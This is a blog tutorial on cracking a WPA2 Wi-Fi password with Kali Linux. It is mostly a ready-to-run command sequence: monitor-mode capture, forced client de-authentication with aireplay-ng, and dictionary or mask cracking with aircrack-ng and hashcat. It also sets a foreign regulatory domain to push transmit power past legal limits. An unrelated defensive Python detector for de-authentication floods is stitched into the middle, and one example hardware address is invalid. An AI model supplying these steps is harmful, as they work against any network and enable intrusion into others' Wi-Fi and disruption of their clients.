I forgot my WIFI password

Oh, it’s no longer a problem…

I want to show how I decrypt my WIFI password. The essential tool in wireless security testing is the wireless adapter. It must support monitoring mode and packet injection into a wireless stream. Usually, standard adapters support monitoring mode, so you will be able to run the airodump-ng command and listen to the wireless traffic around you. But injection mode is required to run the aireplay-ng command. A list of supported adapters is here [1].

I used only these tools below:

  • Laptop with GPU
  • Alfa AWUS036AC adapter
  • Latest Kali Linux

My virtual machine with Kali Linux [2] is ready. I need to make sure my WIFI adapter is attached to the virtual machine.

On the “VirtualBox” toolbar:

Settings > Ports > USB > + > USB Realtek adapter

Once the operating system has loaded (default user root and password toor), I have to check for available WIFI devices in a new terminal window:

iwconfig

I see a device with the name wlan0.

# Optional: upgrading the packages is not necessary.
sudo apt update && sudo apt upgrade -y

By default, the latest Kali has “Hashcat”, “Aircrack-ng” and other tools preinstalled. But it’s possible to use these tools with Ubuntu or another distro.

# Optionally, if OS is not Kali
sudo apt install hashcat aircrack-ng -y

My Alfa adapter is capable of sniffing and injecting packets. I need to switch the adapter into monitoring mode. Usually, a WIFI adapter is recognized as wlan0, and once it goes into monitoring mode it becomes wlan0mon.

airmon-ng check kill && airmon-ng start wlan0

I have to scan the wireless network area and get more technical details about my access point.

airodump-ng wlan0mon

From the output, I see the WIFI signal is strong, packets are increasing, and the channel number is 5. My goal is to catch only my handshake. I have to specify the arguments and start capturing packets into a file.

airodump-ng wlan0mon --channel 5 --bssid 55:CC:BB:11:LT:12 --write mywifi --force

It’s essential to have at least one device connected to the WIFI station. During the full handshake phase, a master key is exchanged between the client and the WIFI station. A new handshake can be forced with the client de-authentication method. In a new terminal, I ran the command with additional arguments for the client, the access point, and the number of de-authentication attempts.

aireplay-ng wlan0mon -a 55:CC:BB:11:LT:12 -c 55:44:44:68:73:65 -0 99

I am waiting for the message WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen (the terminal with airodump-ng). After a few moments, it appears on my screen.
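Seen from the network owner's side, the de-authentication step above is the part that leaves a trace. The following is an added example, not code from the original post: it parses raw 802.11 de-authentication frames and flags bursts per access point and client. It assumes frames are supplied with the radiotap header already stripped; the threshold, the window, the function names and the sample addresses are constructed for illustration.

```python
import struct
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0  # frame control byte 0: version 0, type 0 (management), subtype 12

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame):
    """Return (destination, source, bssid, reason) for a deauth frame, else None."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC0:
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    (reason,) = struct.unpack_from("<H", frame, 24)  # reason code follows the 24-byte header
    return mac(dst), mac(src), mac(bssid), reason

def find_deauth_bursts(records, threshold=10, window=5.0):
    """records: (timestamp_seconds, frame_bytes) pairs sorted by time.
    Returns {(bssid, station): peak_count} for every pair that reaches
    `threshold` deauth frames inside a `window`-second span (assumed values)."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, frame in records:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        dst, src, bssid, _reason = parsed
        station = dst if src == bssid else src  # the non-AP end, whichever direction
        q = recent[(bssid, station)]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alerts[(bssid, station)] = max(alerts.get((bssid, station), 0), len(q))
    return alerts

def build_frame(fc0, dst, src, bssid, reason=7):
    """Constructed test frame: 24-byte management header plus 2-byte reason code."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return bytes([fc0, 0, 0, 0]) + raw(dst) + raw(src) + raw(bssid) + b"\x00\x00" + struct.pack("<H", reason)

# Constructed sample traffic (locally administered addresses, not from the post)
AP, STA, OTHER = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"
SAMPLE = [(0.0, build_frame(0x80, "ff:ff:ff:ff:ff:ff", AP, AP))]                # beacon, ignored
SAMPLE += [(1.0 + i * 0.1, build_frame(0xC0, STA, AP, AP)) for i in range(20)]  # burst at one client
SAMPLE += [(30.0, build_frame(0xC0, AP, OTHER, AP, reason=3))]                  # one ordinary leave

if __name__ == "__main__":
    print(find_deauth_bursts(SAMPLE))
```

Enabling Protected Management Frames (802.11w) on the access point makes clients discard unauthenticated de-authentication frames like these.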

I have two options:

I can use a list of the most common passwords — aircrack-ng with the dictionary attack.

aircrack-ng -a 2 -b 55:CC:BB:11:LT:12 -w wordlist.txt mywifi-01.cap

Or I can convert the capture to the hashcat format and run a mask attack with hashcat.

aircrack-ng -j hashcat mywifi-01.cap
# And it's time for hashcat :)
sudo hashcat -m 2500 -a 3 hashcat.hccapx ?d?d?d?d?d?d?d?d --potfile-path wpa2.pot

The resulting hash, SSID name, and my password are printed in the terminal and saved in a file named “wpa2.pot”.

One more thing: with this configuration you will need to increase TX power up to 1W.

Tested on an AWUS036H

ifconfig wlan0 down
iw reg set GY
ifconfig wlan0 up
ifconfig wlan0

[1] https://null-byte.wonderhowto.com/how-to/check-if-your-wireless-network-adapter-supports-monitor-mode-packet-injection-0191221/
[2] https://medium.com/@tomas_savenas/kali-2018-4-and-metasploit-framework-5-0-73190afc9d96

Cybersecurity enthusiast; most active Lithuanian on the TryHackMe platform; Master's student in Innovation Management and Entrepreneurship @ KTU

Tomas Savenas